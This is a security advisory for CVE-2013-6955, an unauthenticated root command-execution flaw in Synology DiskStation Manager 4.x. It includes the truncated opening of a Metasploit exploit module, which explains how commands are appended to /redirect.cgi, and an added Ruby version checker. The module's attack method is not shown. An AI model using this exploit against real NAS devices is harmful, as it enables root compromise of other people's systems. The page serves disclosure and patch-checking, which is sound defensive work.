Synology DiskStation Manager 'imageSelector.cgi' Remote Command Execution Vulnerability

Published: 2013-12-25
Updated: 2013-12-26

Affected systems:
Synology DiskStation Manager 4.x
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 64516
CVE(CAN) ID: CVE-2013-6955

Synology DiskStation Manager (DSM) is the NAS operating system on Synology devices; it provides a multi-tasking, web-based user interface.

In Synology DiskStation Manager 4.x, /webman/imageSelector.cgi allows arbitrary data to be appended to a chosen file through its SLICEUPLOAD functionality, and this operation can be triggered without authentication. A remote attacker who sends a specially crafted HTTP request can append commands to a shell script served by the web interface and then invoke it, executing arbitrary commands with root privileges.

<*Source: Markus Wulftange
  *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Matches the body returned by GET /webman/info.cgi, e.g.
  # major=4&minor=3&build=3810&junior=0&unique=synology_<arch>_<model>
  DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
                          &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
        versions 4.x, which allows the execution of arbitrary commands under root
        privileges.
        The vulnerability is located in /webman/imageSelector.cgi, which allows to append
        arbitrary data to a given file using a so called SLICEUPLOAD functionality, which
        can be triggered by an unauthenticated user with a specially crafted HTTP request.
        This is exploited by this module to append the given commands to /redirect.cgi,
        which is a regular shell script file, and can be invoked with another HTTP request.
        Synology reported that the vulnerability has been fixed with versions 4.0-2259,
        4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.
      },
      'Author'         =>
        [
          'Markus Wulftange' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-6955' ],
        ],
      'Privileged'     => false,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 0x31337,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'DefaultTarget'  => 0,
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Oct 31 2013'
    ))

    register_options(
      [
        Opt::RPORT(5000) # DSM web interface listens on 5000 (HTTP) by default
      ], self.class)
  end

  def check
    print_status("#{peer} - Trying to detect installed version")

    # info.cgi is reachable without authentication and reports the DSM
    # major/minor/build numbers that the check compares against the fixed versions.
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri('webman', 'info.cgi'),
      'vars_get' => { 'host' => '' }
    })

    # The module listing on this page ends here; the remainder of check and the
    # exploit method are not reproduced.
  end
end
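The listing stops before the version comparison, so the following is an added example (written for this page, not code from the advisory or from Markus Wulftange's module) of how a checker can turn the /webman/info.cgi response into a verdict. It reuses the module's DEVICE_INFO_PATTERN as shown above and takes its thresholds from the fixed versions quoted in the advisory (4.0-2259, 4.2-3243, 4.3-3810 Update 1, with 4.1 never fixed). The names FIXED_BUILDS, parse_device_info, assess_dsm and assess_info_cgi are chosen here, and the sample responses are constructed. The caveat it encodes is one a practitioner should keep in mind: info.cgi reports only a build number, so a device reporting 4.3 build 3810 cannot be told apart from 4.3-3810 Update 1 from this response alone, and the example reports it as ambiguous rather than patched.

```ruby
# Added example, not part of the advisory or of the Metasploit module on this
# page. Regex as in the module; version thresholds from the advisory text;
# function and constant names are assumptions made for this example.

DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
                        &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x

# First build in each 4.x branch that the vendor reported as fixed.
# 4.1 is absent on purpose: the advisory says that branch stayed vulnerable.
FIXED_BUILDS = { 0 => 2259, 2 => 3243, 3 => 3810 }.freeze

# Parses the body of GET /webman/info.cgi?host= into a hash, or returns nil
# when the body does not look like a DSM device-info response.
def parse_device_info(body)
  m = DEVICE_INFO_PATTERN.match(body.to_s)
  return nil unless m
  {
    major: m[:major].to_i,
    minor: m[:minor].to_i,
    build: m[:build].to_i,
    model: m[:model]
  }
end

# Classifies a parsed device-info hash:
#   :vulnerable - build is below the branch's fixed build, or the branch is 4.1
#   :patched    - build is above the fixed build (or equal, for 4.0 and 4.2)
#   :ambiguous  - exactly 4.3 build 3810: the fix is "3810 Update 1" and the
#                 build number from info.cgi does not carry the Update level
#   :unknown    - not DSM 4.x, an unexpected minor, or an unparsable body
def assess_dsm(info)
  return :unknown if info.nil? || info[:major] != 4

  minor = info[:minor]
  build = info[:build]
  return :vulnerable if minor == 1            # no fix was released for 4.1
  return :unknown unless FIXED_BUILDS.key?(minor)

  fixed = FIXED_BUILDS[minor]
  if build < fixed
    :vulnerable
  elsif minor == 3 && build == fixed
    :ambiguous                                # 4.3-3810 without Update 1 is still vulnerable
  else
    :patched
  end
end

# Convenience wrapper: raw info.cgi body in, verdict out.
def assess_info_cgi(body)
  assess_dsm(parse_device_info(body))
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample responses: the field layout follows DEVICE_INFO_PATTERN,
  # the architecture/model strings and build numbers are illustrative.
  [
    "major=4&minor=0&build=2228&junior=0&unique=synology_bromolow_3612xs",
    "major=4&minor=1&build=2668&junior=0&unique=synology_cedarview_412+",
    "major=4&minor=2&build=3243&junior=0&unique=synology_cedarview_412+",
    "major=4&minor=3&build=3810&junior=0&unique=synology_x86_713+",
    "major=4&minor=3&build=3827&junior=0&unique=synology_x86_713+",
    "<html>not a DSM device</html>"
  ].each { |body| puts "#{body[0, 40]}... => #{assess_info_cgi(body)}" }
end
```

Because the regex anchors on the unique=synology_ field, a non-DSM service answering on port 5000 falls through to :unknown instead of being misreported; an :ambiguous result is the signal to confirm the Update level through the DSM interface before drawing a conclusion.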
